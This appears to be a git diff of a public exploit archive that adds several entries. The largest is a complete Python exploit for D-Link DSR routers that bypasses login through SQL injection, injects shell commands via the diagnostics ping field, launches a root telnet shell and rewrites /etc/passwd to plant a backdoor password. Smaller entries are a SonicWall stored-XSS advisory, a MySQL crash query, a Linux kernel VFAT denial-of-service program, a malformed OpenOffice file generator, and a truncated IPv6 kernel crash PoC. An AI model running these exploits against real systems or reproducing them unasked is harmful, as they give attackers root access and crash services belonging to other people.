+ + +Reference(s): +http://localhost:6688/index.html +http://localhost:6688/albumhtm +http://localhost:6688/albumhtm?id= +http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure encode and parse of the vulnerable album name value. +Parse and filter also the index and sub category output list to ensure it prevents local command/path requests. + + +Security Risk: +============== +The security risk of the local command/path inject web vulnerability is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2013 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/hardware/webapps/30062.py b/platforms/hardware/webapps/30062.py new file mode 100755 index 000000000..fc0114f1d --- /dev/null +++ b/platforms/hardware/webapps/30062.py @@ -0,0 +1,303 @@ +#!/usr/bin/python +# +# CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection +# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution +# +# Vulnerable Routers: D-Link DSR-150 (Firmware < v1.08B44) +# D-Link DSR-150N (Firmware < v1.05B64) +# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44) +# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77) +# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77) +# +# Likely to work on: D-Link DWC-1000 +# +# Download URL: http://tsd.dlink.com.tw +# +# Arch: mips and armv6l, Linux +# +# Author: 0_o -- null_null +# nu11.nu11 [at] yahoo.com +# Oh, and it is n-u-one-one.n-u-one-one, no l's... +# Wonder how the guys at packet storm could get this wrong :( +# +# Date: 2013-08-18 +# +# Purpose: Get a non-persistent root shell on your D-Link DSR. +# +# Prerequisites: Network access to the router ports 443 and 23. +# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!! +# +# +# Coordinated Disclosure -- history and timeline: +# +# 2013-09-12: Informed Heise Security and asked for their support on this case +# 2013-09-13: Informed the manufacturer D-Link via +# http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/ (contact form is buggy!) +# http://www.d-link.co.za/contactus/feedback/ (contact request submitted) +# http://www.dlink.com/de/de/contact-d-link (contact form is buggy!) +# mail@dlink.ru (contact request sent) +# info@dlink.ee (contact request sent) +# info@dlink.de (contact request sent) +# 2013-09-14: Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de +# 2013-09-16: D-Link Russia and D-Link Germany claim to have forwarded my request. +# 2013-09-17: German BSI responds, contact established. +# 2013-09-24: Requested CVE-IDs. +# 2013-09-25: Heise responds, contact established. +# 2013-09-27: D-Link asks for details on vulns and the exploit code. +# Mitre assigns two CVEs: +# CVE-2013-5945 -- authentication bypass +# CVE-2013-5946 -- privilege escalation +# 2013-09-30: D-Link has received the exploit and documentation via BSI +# 2013-11-29: Patches are available for the DSR router series via tsd.dlink.com.tw +# DSR-150: Firmware v1.08B44 +# DSR-150N: Firmware v1.05B64 +# DSR-250 and DSR-250N: Firmware v1.08B44 +# DSR-500 and DSR-500N: Firmware v1.08B77 +# DSR-1000 and DSR-1000N: Firmware v1.08B77 +# 2013-12-03: Public Disclosure +# +# And now - the fun part :-) +# + + +import httplib +import urllib +import telnetlib +import time +import sys +import crypt +import random +import string + + +############################## +# +# CHANGE THESE VALUES -- BEGIN +# +# Your router's IP:PORT +ipaddr = "192.168.10.1:443" +# Password to be set (by this hack) on the backdoor account +bdpasswd = "password" +# +# CHANGE THESE VALUES -- END +# +# persistent config file: /tmp/teamf1.cfg.ascii +# Edit this file to make your changes persistent. +# +############################## + + +cookie = "" +pid = -2 +bduser = "" + + +def request(m = "", u = "", b = "", h = ""): + global ipaddr + conn = httplib.HTTPSConnection(ipaddr, timeout = 15) + assert m in ["GET", "POST"] + conn.request(method = m, url = u, body = b, headers = h) + ret = conn.getresponse() + header = ret.getheaders() + data = ret.read() + conn.close() + return (header, data) + + +def login(user, passwd): + global ipaddr + headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'User-Agent': "Exploit", + 'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi", + 'Content-Type': "application/x-www-form-urlencoded"} + body = {'thispage' : "index.htm", + 'Users.UserName' : user, + 'Users.Password' : passwd, + 'button.login.Users.deviceStatus' : "Login", + 'Login.userAgent' : "Exploit"} + return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers) + + +def logout(): + global ipaddr, cookie + headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'User-Agent': "Exploit", + 'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi", + 'Content-Type': "application/x-www-form-urlencoded"} + body = "" + return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers) + + +def execCmd(cmd = None): + global ipaddr, cookie + assert cmd != None + headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'User-Agent': "Exploit", + 'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm", + 'Cookie': cookie, + 'Content-Type': "application/x-www-form-urlencoded"} + body = {'thispage' : "systemCheck.htm", + 'ping.ip' : "localhost;" + cmd, + 'button.traceroute.diagDisplay' : "Traceroute"} + return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers) + + +def findPid(mystr = None): + # " 957 root 2700 S /usr/sbin/telnetd -l /bin/login" + assert mystr != None + mypid = 0 + (h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep"); + s = d.find(mystr) + if s > 0: + # telnetd is running + cand = d[s - 50 : s] + try: + mypid = int(cand.split("\n")[1].split()[0]) + except IndexError: + mypid = int(cand.split(">")[1].split()[0]) + return mypid + + +def restartTelnetd(mystr1 = None, mystr2 = None): + assert mystr1 != None and mystr2 != None + global pid + pid = findPid("telnetd -l /bin/") + if pid > 0: + # Stopping the running telnetd + print "[+] Stopping telnetd (" + str(pid) + "): ", + sys.stdout.flush() + (h, d) = execCmd("kill " + str(pid)) + pid = findPid(mystr1) + if pid > 0: + print "FAILURE" + sys.exit(-1) + else: + print "OK" + # Starting a new telnetd + print "[+] Starting telnetd: ", + sys.stdout.flush() + (h, d) = execCmd("telnetd -l " + mystr2) + pid = findPid("telnetd -l " + mystr2) + if pid > 0: + print "OK (" + str(pid) + ")" + else: + print "FAILURE" + sys.exit(-1) + + +def main(): + global ipaddr, cookie, pid, bduser, bdpasswd + user = "admin" + passwd = "' or 'a'='a" + print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)" + print "This change is non-persistent to device reboots." + print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n" + # Logging into the router + print "[+] Trying to log into the router: ", + sys.stdout.flush() + (h, d) = login(user, passwd) + if d.find("User already logged in") > 0: + print "FAILURE" + print "[-] The user \"admin\" is still logged in. Please log out from your current session first." + sys.exit(-1) + elif d.find('Logout') > 0: + while h: + (c1, c2) = h.pop() + if c1 == 'set-cookie': + cookie = c2 + break + print "OK (" + cookie + ")" + elif d.find("Invalid username or password") > 0: + print "FAILURE" + print "[-] Invalid username or password" + sys.exit(-1) + else: + print "FAILURE" + print "[-] Unable to login." + sys.exit(-1) + + # Starting a telnetd with custom parameters + print "[+] Preparing the hack..." + restartTelnetd("/bin/login", "/bin/sh") + + # Do the h4cK + print "[+] Hacking the router..." + print "[+] Getting the backdoor user name: ", + sys.stdout.flush() + tn = telnetlib.Telnet(ipaddr.split(":")[0]) + tn.read_very_eager() + tn.write("cat /etc/profile\n") + time.sleep(5) + data = tn.read_very_eager() + for i in data.split("\n"): + if i.find('"$USER"') > 0: + bduser = i.split('"')[3] + break + if len(bduser) > 0: + print "OK (" + bduser + ")" + else: + print "FAILURE" + sys.exit(-1) + print "[+] Setting the new password for " + bduser + ": ", + sys.stdout.flush() + tn.write("cat /etc/passwd\n") + time.sleep(5) + data = tn.read_very_eager() + data = data.split("\n") + data.reverse() + data.pop() + data.reverse() + data.pop() + data = "\n".join(data) + for i in data.split("\n"): + if i.find(bduser) >= 0: + line = i.split(':') + s1 = string.lowercase + string.uppercase + string.digits + salt = ''.join(random.sample(s1,2)) + pw = crypt.crypt(bdpasswd, salt) + line[1] = pw + # doesn't work for some odd reason -- too lazy to find out why + #salt = ''.join(random.sample(s1,8)) + #line[1] = crypt.crypt(bdpasswd, '$1$' + salt + '$') + data = data.replace(i, ":".join(line)) + break + tn.write('echo -en "" > /etc/passwd\n') + time.sleep(5) + for i in data.split("\n"): + tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n') + time.sleep(1) + data = tn.read_very_eager() + tn.close() + if data.find(pw) >= 0: + print "OK (" + pw + ")" + success = True + else: + print "FAILURE" + print "[-] Could not set the new password." + sys.exit(-1) + + # Switching back to the originals + print "[+] Mobbing up..." + restartTelnetd("/bin/sh", "/bin/login") + + # Logging out + print "[+] Logging out: ", + sys.stdout.flush() + (h, d) = logout() + if d.find('value="Login"') > 0: + print "OK" + else: + print "FAILURE" + print "[-] Unable to determine if user is logged out." + + # Print success message + if success: + print "[+] You can now log in via SSH and Telnet by using:" + print " user: " + bduser + print " pass: " + bdpasswd + print " These changes will be reverted upon router reboot." + print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent." + +main() +sys.exit(0) + diff --git a/platforms/jsp/webapps/30054.txt b/platforms/jsp/webapps/30054.txt new file mode 100755 index 000000000..e8e90a0b3 --- /dev/null +++ b/platforms/jsp/webapps/30054.txt @@ -0,0 +1,234 @@ +Document Title: +=============== +Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1099 + +Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting Vulnerability +http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf + + +Release Date: +============= +2013-12-05 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1099 + + +Common Vulnerability Scoring System: +==================================== +4.1 + + +Product & Service Introduction: +=============================== +Dell SonicWALL`s management and reporting solutions provide a comprehensive architecture for centrally creating and managing +security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from +a single management interface. Whether your organization is a small- or medium-sized business, a distributed enterprise or a +managed service provider, Dell™ SonicWALL™ offers software and appliance solutions to meet its needs. + +The award-winning Dell SonicWALL Global Management System (GMS®) provides organizations, distributed enterprises and service +providers with a flexible, powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, +backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware—in the form of the Universal +Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides centralized real-time monitoring and comprehensive +policy and compliance reporting to drive down the cost of owning and managing SonicWALL security appliances. Multiple GMS +software, hardware, and virtual appliance agents, when deployed in a cluster, can scale to manage thousands of SonicWALL +security appliances. This makes GMS an ideal solution for small- to medium-sized businesses, enterprises and managed service +providers that have either single-site or distributed multi-site environments. + +(Copy of the Vendor Homepage: http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a persistent validation vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application. + + +Vulnerability Disclosure Timeline: +================================== +2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri) +2013-09-27: Vendor Notification (DELL SonicWall Security Team) +2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team) +2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team) +2013-12-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +DELL SonicWall +Product: GMS Networks Appliance Application 7.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official DELL SonicWall GMS v7.1.x Appliance Web-Application. +The bug allows an attacker (remote) to implement/inject own malicious malicious script codes on the application-side (persistent). + +The persistent vulnerability is located in the `valfield_1` & `value_1` value parameters of the `Alert Settings` module POST method request. +Remote attackers with low privileged application user account can inject own script codes to the POST method request of the createNewThreshold.jsp +appliance application file. After the inject the attacker is able to update and save the values to continue with the execute the main alert +settings module. The execute of the script code occurs in the ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable values. + +To bypass the filter it is required to split the request by attaching a double frame for the script code execute. The restricted application itself +disallows the POST request of guest by usage of the unrestricted context POST method request attackers are able to bypass the filter & exception-handling. + +The security risk of the persistent input validation web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) +count of 4.1(+). The coordinated disclosure procedure of the remote vulnerability has been navigated by the product manager Wilson Lee (DELL). +The hotfix and information has been provided in cooperation with the vulnerability-laboratory. + +Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged (guest) web application user account. +Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, +persistent phishing or persistent manipulation of vulnerable module context. + +Vulnerable Application(s): + [+] DELL - SonicWall GMS v7.1.x Appliance Application + +Vulnerable Module(s): + [+] Alert Settings > NewThreshold + +Vulnerable File(s): + [+] createNewThreshold.jsp > ematStaticAlertTypes.jsp + +Vulnerable Parameter(s): + [+] valfield_1 + [+] value_1 + +Affected Module(s): + [+] createNewThreshold + [+] ematStaticAlertTypes + [+] Alert Settings - Main Listing + +Affected Product(s): + [+] Dell SonicWALL GMS + [+] Dell SonicWALL Analyzer + [+] Dell SonicWALL UMA E5000 + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers with low privileged or restricted guest accounts and +low user interaction. For security demonstration or reproduce the vulnerability follow the information and steps below. + + +Location: Alert Settings +http://gms.localhost:8080/sgms/panelManager?panelidz=1&level=1&typeOfUnits=0# + +Inject via Add: Edit contents for alert type: Backed-Up Syslog Files +http://gms.localhost:8080/sgms/ematStaticAlertTypes.jsp? + +Execute: Create New Threshold +http://gms.localhost:8080/sgms/createNewThreshold.jsp? + +Affected: +http://gms.localhost:8080/sgms/auth + + + +Manual steps to reproduce ... + +1. Open the Sonicwall GMS appliance application and login with full restrictions as guest +2. Switch to the vulnerable Console > Events > Alert Settings section +3. Click Add Alert and a new blank window of the application will be opened +4. Click in the upcomings window in the Alert Types section the Edit Content link +5. Now, a new window opens "Edit contents for alert type: Backup Sys-Log Files +6. On top is a little plus button next to the Threshold value +9. A new window opens with Elements box ... Inject your payload (script code) to the description eval in the operator fields +10. After the inject to the input fields the attacker only needs to click the Add Element button on the buttom of the page +11. The code will be directly executed and is persistent saved as element in the specific section +12. Save the input via update and go back to the alert settings main section were the code execute occurs in the same connected value +13. Successful reproduced! + + + +PoC: Alert Settings - Create New Threshold + +Critical + + + +Delete this destination + + Description: + >"<[PERSISTENT INJECTED SCRIPT CODE!]">" +onkeyup="enableAutoDesc(1,0);"> + + +Note: Please, feel free to read also the patch information provided in the solution section of the advisory document. + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse, prevention filter mechanism or clean encode of the vulnerable value_1 and valfield_1 parameters. +Also restrict and escape the affected input field and output listing in the connected modules. + +Resolution (DELL SonicWall): +We recommend existing users of Dell SonicWALL GMS/Analyzer/UMA 7.1 to apply SP1 (if they have not already done so), and then apply Hotfix 134235 to prevent cross-site scripting by unauthorized users. 7.1 SP1 and the Hotfix are available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “GMS/Analyzer” in the Software Type drop down menu. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability with filter bypass is estimated as medium(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2013 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/dos/30020.txt b/platforms/linux/dos/30020.txt new file mode 100755 index 000000000..7c536d8f1 --- /dev/null +++ b/platforms/linux/dos/30020.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/23911/info + +MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. + +An attacker can exploit this issue to crash the application, denying access to legitimate users. + +NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities. + +Versions prior to MySQL 5.0.40 are vulnerable. + +SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0))); \ No newline at end of file diff --git a/platforms/linux/dos/30024.txt b/platforms/linux/dos/30024.txt new file mode 100755 index 000000000..7b371967a --- /dev/null +++ b/platforms/linux/dos/30024.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/23927/info + +The libexif library is prone to an integer-overflow vulnerability because the software fails to properly ensure that integer math operations do not result in overflows. + +Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of an application using the vulnerable library. Failed attempts will likely result in denial-of-service conditions. + +Versions of libexif prior to 0.6.14 are vulnerable to this issue. + +http://www.exploit-db.com/sploits/30024.jpg \ No newline at end of file diff --git a/platforms/linux/dos/30044.txt b/platforms/linux/dos/30044.txt new file mode 100755 index 000000000..046073fd6 --- /dev/null +++ b/platforms/linux/dos/30044.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24004/info + +Sun JDK is prone to a multiple vulnerabilities. + +An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system. + +Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. + +http://www.exploit-db.com/sploits/30043.zip \ No newline at end of file diff --git a/platforms/linux/dos/30080.c b/platforms/linux/dos/30080.c new file mode 100755 index 000000000..156428d18 --- /dev/null +++ b/platforms/linux/dos/30080.c @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/24134/info + +The Linux Kernel is prone to a denial-of-service vulnerability. + +A local attacker can exploit this issue to cause the kernel to crash, effectively denying service to legitimate users. + +#include + #include + #include + #include + #include + #include + struct kernel_dirent { + long d_ino; + long d_off; + unsigned short d_reclen; + char d_name[256]; /* We must not include limits.h! */ + }; + #define VFAT_IOCTL_READDIR_BOTH _IOR('r', 1, struct kernel_dirent [2]) + #define VFAT_IOCTL_READDIR_SHORT _IOR('r', 2, struct kernel_dirent [2]) + + int main(void) + { + int fd = open(".", O_RDONLY); + struct kernel_dirent de[2]; + + while (1) { + int i = ioctl(fd, VFAT_IOCTL_READDIR_BOTH, (long)de); + if (i == -1) break; + if (de[0].d_reclen == 0) break; + printf("SFN: reclen=%2d off=%d ino=%d, %-12s", + de[0].d_reclen, de[0].d_off, de[0].d_ino, de[0].d_name); + if (de[1].d_reclen) + printf("\tLFN: reclen=%2d off=%d ino=%d, %s", + de[1].d_reclen, de[1].d_off, de[1].d_ino, de[1].d_name); + printf("\n"); + } + return 0; + } diff --git a/platforms/linux/dos/30091.py b/platforms/linux/dos/30091.py new file mode 100755 index 000000000..73259612b --- /dev/null +++ b/platforms/linux/dos/30091.py @@ -0,0 +1,91 @@ +source: http://www.securityfocus.com/bid/24186/info + +The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability. + +Successful exploits may allow remote attackers to cause denial-of-service conditions on the webserver running the affected application. + +OpenOffice 2.2.0 is vulnerable; other versions may also be affected. + +import sys +import time + +print "--------------------------------------------------------" +print " OpenOffice.org 2.2.0 Writer Denial of Service " +print " url: http://www.openoffice.org/ " +print " " +print " author: shinnai " +print " mail: shinnai[at]autistici[dot]org " +print " site: http://shinnai.altervista.org " +print " " +print " If you want, you can change the file extension in .doc " +print "--------------------------------------------------------" + +exploit = \ +"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\ +"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\ +"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\ +"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\ +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\ +"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\ +"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\ +"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47" + +while 1: + print " OPTIONS " + print " 1 -> Create file exploit.otp " + print " 2 -> Quit\n " + print "--------------------------------------------------------" + + choice = 0 + + while 1: + try: + choice = int(raw_input("Make your choice: ")) + if choice != 1 and choice != 2: + print "ehm... Invalid choice...\n" + else: + break + except: + print "ehm... Invalid choice...\n" + + if choice == 1: + flag = 1 + try: + fileOut = open('exploit.otp','w') + fileOut.write(exploit) + fileOut.close() + print "File created!\nBe safe!" + except: + print "Unable to create file." + + if choice == 2: + print "Be safe!" + time.sleep(2) + sys.exit() diff --git a/platforms/linux/dos/4893.c b/platforms/linux/dos/4893.c index 1176c1085..935fec900 100755 --- a/platforms/linux/dos/4893.c +++ b/platforms/linux/dos/4893.c @@ -1,134 +1,134 @@ -/* - * Clemens Kurtenbach - * PoC code for exploiting the jumbo bug found in - * linux kernels >=2.6.20 and <=2.6.21.1 - * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash - * - */ - - -/* io */ -#include -#include -#include - -/* network */ -#include -#include -#include -#include -#include -#include - -#define MY_FRAME_LEN 1145 - -char *resolve6(unsigned char *target) { - char *ret_addr; - struct in6_addr my_in6; - char *glob_addr = (char *) &my_in6; - struct addrinfo addr_hints, *addr_result; - unsigned char out[64]; - - memset(&addr_hints, 0, sizeof(addr_hints)); - addr_hints.ai_family = AF_INET6; - - if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { - printf("getaddrinfo() error\n"); - exit(1); - } - if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ - printf("getnameinfo() error\n"); - exit(1); - } - if(inet_pton(AF_INET6, out, glob_addr) < 0) { - printf("inet_pton() error\n"); - exit(1); - } - if((ret_addr = malloc(16)) == NULL) { - printf("malloc() error\n"); - exit(1); - } - memcpy(ret_addr, my_in6.s6_addr, 16); - return ret_addr; -} - -int main(int argc, char *argv[]) { - - if (argc < 4) { - printf("usage: ./ipv6_jumbo_crash <00:11:22:33:44:55> \n"); - exit(1); - } - - /* handle IPv6 destination */ - unsigned char *dest_ip = resolve6(argv[1]); - - /* handle MAC */ - unsigned char dest_mac[7]; - sscanf(argv[2], "%x:%x:%x:%x:%x:%x", - (unsigned 